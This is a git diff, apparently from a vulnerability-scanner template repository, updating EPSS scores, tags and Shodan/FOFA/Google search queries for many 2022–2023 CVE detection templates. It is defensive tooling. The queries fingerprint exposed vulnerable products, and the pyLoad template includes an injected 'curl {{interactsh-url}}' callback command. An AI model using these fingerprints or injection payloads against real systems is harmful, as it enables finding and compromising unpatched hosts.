title="perfsonar toolkit" tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index ecbc89d286..06718fb276 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: reqlogic product: reqlogic - shodan-query: http.html:"ReQlogic" + shodan-query: + - http.html:"ReQlogic" + - http.html:"reqlogic" fofa-query: body="reqlogic" tags: cve,cve2022,packetstorm,xss,reqlogic diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index d3fd5a34f8..0425c0cd93 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rpcms product: rpcms - shodan-query: http.html:"RPCMS" + shodan-query: + - http.html:"RPCMS" + - http.html:"rpcms" fofa-query: body="rpcms" tags: cve,cve2022,rpcms,xss diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 14ab26f454..70d56a827f 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 - epss-score: 0.0071 - epss-percentile: 0.80039 + epss-score: 0.00858 + epss-percentile: 0.82247 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 70d7002717..611aa9d9ae 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -19,16 +19,21 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 - epss-score: 0.87277 - epss-percentile: 0.9839 + epss-score: 0.67005 + epss-percentile: 0.9794 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: tenda product: 11n_firmware - shodan-query: http.title:"Tenda 11N" - fofa-query: product=="Tenda-11N-Wireless-AP" + shodan-query: + - http.title:"Tenda 11N" + - http.title:"tenda 11n" + fofa-query: + - product=="Tenda-11N-Wireless-AP" + - product=="tenda-11n-wireless-ap" + - title="tenda 11n" google-query: intitle:"tenda 11n" tags: cve,cve2022,tenda,auth-bypass,router,iot diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index c5e80e79f7..371ac72b8c 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -21,15 +21,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42746 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index d6d35eb203..989c9c9c6e 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index d3e44e6d09..837b641fbe 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 674ba7414d..8037c57a0c 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -21,15 +21,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42749 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: auieo product: candidats - shodan-query: http.html:"CandidATS" + shodan-query: + - http.html:"CandidATS" + - http.html:"candidats" fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index d6ad8ae12e..1c08ea0c16 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -28,9 +28,9 @@ info: vendor: appjetty product: show_all_comments framework: wordpress - publicwww-query: /wp-content/plugins/show-all-comments-in-one-page shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 597ad2ddb7..aa8ddb10f9 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9775a520b9..d0963bf496 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index a1092ce628..3cec46f8ca 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 792970c05a..5f724a60f0 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index d1a00915ab..aad436fe5a 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: opencats product: opencats - shodan-query: title:"OpenCATS" + shodan-query: + - title:"OpenCATS" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 54123c2046..b8d9c04e22 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -25,9 +25,9 @@ info: vendor: wp-buy product: login_as_user_or_customer_\(user_switching\) framework: wordpress - publicwww-query: /wp-content/plugins/login-as-customer-or-user shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user fofa-query: body=/wp-content/plugins/login-as-customer-or-user + publicwww-query: /wp-content/plugins/login-as-customer-or-user tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index e3e3d11b41..5f5be46b66 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -18,16 +18,21 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.15211 - epss-percentile: 0.95316 + epss-score: 0.01954 + epss-percentile: 0.88673 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: app="kkFileView" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - app="kkFileView" + - app="kkfileview" + - body="kkfileview" tags: cve2022,cve,ssrf,kkFileview,keking http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index e02cf51aae..e8fe5e157f 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00197 - epss-percentile: 0.56575 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 0260380daf..17eb6def11 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00197 - epss-percentile: 0.56575 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 00849a488f..0fde0972d0 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -29,9 +29,9 @@ info: vendor: wpswings product: pdf_generator_for_wordpress framework: wordpress - publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" shodan-query: http.html:/wp-content/plugins/pdf-generator-for-wp fofa-query: body=/wp-content/plugins/pdf-generator-for-wp + publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index d44d8a29fa..49637bb90e 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.33038 - epss-percentile: 0.96634 + epss-score: 0.68571 + epss-percentile: 0.97978 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 055295ce1d..92e9cdcf6a 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: control-webpanel product: webpanel - shodan-query: http.title:"Login | Control WebPanel" + shodan-query: + - http.title:"Login | Control WebPanel" + - http.title:"login | control webpanel" fofa-query: title="login | control webpanel" google-query: intitle:"login | control webpanel" tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index dc9e2bc9d0..50b2cd8202 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44944 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 762fd50d19..05208a18ce 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-44946 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38539 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index f4a4f29b6e..6206da0636 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-44950 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 07a2b5374f..cb6812aa19 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -28,9 +28,11 @@ info: vendor: wpchill product: download_monitor framework: wordpress - shodan-query: html:"/wp-content/plugins/download-monitor/" + shodan-query: + - html:"/wp-content/plugins/download-monitor/" + - http.html:"/wp-content/plugins/download-monitor/" fofa-query: body="/wp-content/plugins/download-monitor/" - tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill http: - method: GET diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index e74f9d6693..07807ed6b9 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -27,10 +27,10 @@ info: vendor: urosevic product: stock_ticker framework: wordpress - publicwww-query: "/wp-content/plugins/stock-ticker/" shodan-query: http.html:/wp-content/plugins/stock-ticker/ fofa-query: body=/wp-content/plugins/stock-ticker/ - tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + publicwww-query: "/wp-content/plugins/stock-ticker/" + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic http: - raw: diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 20b4393803..338b8cadc1 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-45835 cwe-id: CWE-918 epss-score: 0.00359 - epss-percentile: 0.71627 + epss-percentile: 0.72144 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index e85e861ccb..1d80b0dafc 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: ilias product: ilias - shodan-query: http.html:"ILIAS" + shodan-query: + - http.html:"ILIAS" + - http.html:"ilias" fofa-query: body="ilias" tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 6553267523..8db6690e21 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: kubeview_project product: kubeview - shodan-query: http.title:"KubeView" - fofa-query: icon_hash=-379154636 + shodan-query: + - http.title:"KubeView" + - http.title:"kubeview" + - http.favicon.hash:-379154636 + fofa-query: + - icon_hash=-379154636 + - title="kubeview" google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index b4b8c945ae..afee472e3b 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 epss-score: 0.01454 - epss-percentile: 0.86393 + epss-percentile: 0.86654 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index aa6fc64388..c7106c825e 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -29,9 +29,18 @@ info: max-request: 1 vendor: cacti product: cacti - shodan-query: title:"Login to Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Login to Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 43c09d75ef..cecfcbaa83 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: niceforyou product: linear_emerge_e3_access_control_firmware - shodan-query: http.html:"Linear eMerge" + shodan-query: + - http.html:"Linear eMerge" + - http.html:"linear emerge" fofa-query: body="linear emerge" tags: cve,cve2022,xss,emerge,linear,niceforyou diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 0fa198b5eb..4b8ae5d13c 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46443 cwe-id: CWE-89 epss-score: 0.05592 - epss-percentile: 0.93095 + epss-percentile: 0.93248 cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 4e02ca493e..babbd5d474 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: nexusphp product: nexusphp - shodan-query: http.favicon.hash:-582931176 + shodan-query: + - http.favicon.hash:-582931176 + - cpe:"cpe:2.3:a:nexusphp:nexusphp" fofa-query: icon_hash=-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 5ae2e1994a..df3133b976 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -26,8 +26,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index edf8e1eff8..061424f51c 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: masacms product: masacms - shodan-query: 'Generator: Masa CMS' + shodan-query: + - 'Generator: Masa CMS' + - "generator: masa cms" tags: cve,cve2022,auth-bypass,cms,masa,masacms http: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 0b3e0366f1..f66ac4443f 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: murasoftware product: mura_cms - shodan-query: 'Generator: Mura CMS' + shodan-query: + - 'Generator: Mura CMS' + - "generator: mura cms" tags: cve,cve2022,auth-bypass,cms,mura,murasoftware http: diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index 9b12e3ac63..fea929fed9 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -17,15 +17,21 @@ info: cvss-score: 7.5 cve-id: CVE-2022-47501 cwe-id: CWE-22 - epss-score: 0.12161 - epss-percentile: 0.94898 + epss-score: 0.09756 + epss-percentile: 0.94792 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: ofbiz - shodan-query: "html:\"OFBiz\"" - fofa-query: "app=\"Apache_OFBiz\"" + shodan-query: + - "html:\"OFBiz\"" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - "app=\"Apache_OFBiz\"" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2022,apache,ofbiz,lfi http: diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 232421323d..cddc995cea 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -29,9 +29,9 @@ info: vendor: thimpress product: learnpress framework: wordpress - publicwww-query: "/wp-content/plugins/learnpress" shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress + publicwww-query: "/wp-content/plugins/learnpress" tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 910a6fbdba..b091627374 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: thinkphp product: thinkphp - shodan-query: title:"Thinkphp" - fofa-query: header="think_lang" + shodan-query: + - title:"Thinkphp" + - http.title:"thinkphp" + - cpe:"cpe:2.3:a:thinkphp:thinkphp" + fofa-query: + - header="think_lang" + - title="thinkphp" google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,lfi diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 0b34a2dd6c..069c97cfb5 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_access_manager_plus - shodan-query: title:"ManageEngine" + shodan-query: + - title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 97d973e7db..daac10983c 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -28,8 +28,10 @@ info: max-request: 1 vendor: linux product: linux_kernel - shodan-query: html:"Aspera Faspex" - tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm + shodan-query: + - html:"Aspera Faspex" + - cpe:"cpe:2.3:o:linux:linux_kernel" + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux http: - raw: diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 85df6e54b5..6dc72856be 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: opencats product: opencats - shodan-query: title:"opencats" + shodan-query: + - title:"opencats" + - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 2483354417..7668f6cd5a 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -26,7 +26,9 @@ info: max-request: 9 vendor: yui_project product: yui - shodan-query: html:"bower_components/yui2/" + shodan-query: + - html:"bower_components/yui2/" + - http.html:"bower_components/yui2/" fofa-query: body="bower_components/yui2/" tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 7ab571c47e..c47ec3e49e 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -21,13 +21,14 @@ info: epss-percentile: 0.84061 cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: wprealize - product: extensive_vc_addons_for_wpbakery_page_builder + product: "extensive_vc_addons_for_wpbakery_page_builder" framework: wordpress - shodan-query: http.html:/wp-content/plugins/extensive-vc-addon/ - fofa-query: body=/wp-content/plugins/extensive-vc-addon/ + shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/" + fofa-query: "body=/wp-content/plugins/extensive-vc-addon/" publicwww-query: "/wp-content/plugins/extensive-vc-addon/" - tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize http: - raw: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 26cafe16f6..f21057eec9 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -29,10 +29,21 @@ info: max-request: 2 vendor: pyload product: pyload - shodan-query: html:"pyload" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" - zoomeye-query: app:"pyLoad" + shodan-query: + - html:"pyload" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: + - app:"pyLoad" + - app:"pyload" tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5a23d85203..ade7803908 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer - shodan-query: http.favicon.hash:1484947000 - fofa-query: app="goanywhere-mft" + shodan-query: + - http.favicon.hash:1484947000 + - http.favicon.hash:1484947000,1828756398,1170495932 + fofa-query: + - app="goanywhere-mft" + - icon_hash=1484947000 + - icon_hash=1484947000,1828756398,1170495932 zoomeye-query: app:"fortra goanywhere-mft" tags: cve2023,cve,rce,goanywhere,oast,kev,fortra diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index e9fa8facd9..19a95204fc 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -17,10 +17,13 @@ info: epss-percentile: 0.8962 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: phpipam product: phpipam - shodan-query: html:"phpIPAM IP address management" - fofa-query: body="phpipam ip address management" + shodan-query: + - "html:\"phpIPAM IP address management\"" + - http.html:"phpipam ip address management" + fofa-query: "body=\"phpipam ip address management\"" tags: cve,cve2023,php,phpipam,unauth http: diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index 8bf35a1aaa..8788837e19 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -25,8 +25,14 @@ info: max-request: 3 vendor: modoboa product: modoboa - shodan-query: html:"Modoboa" - fofa-query: body="Modoboa" + shodan-query: 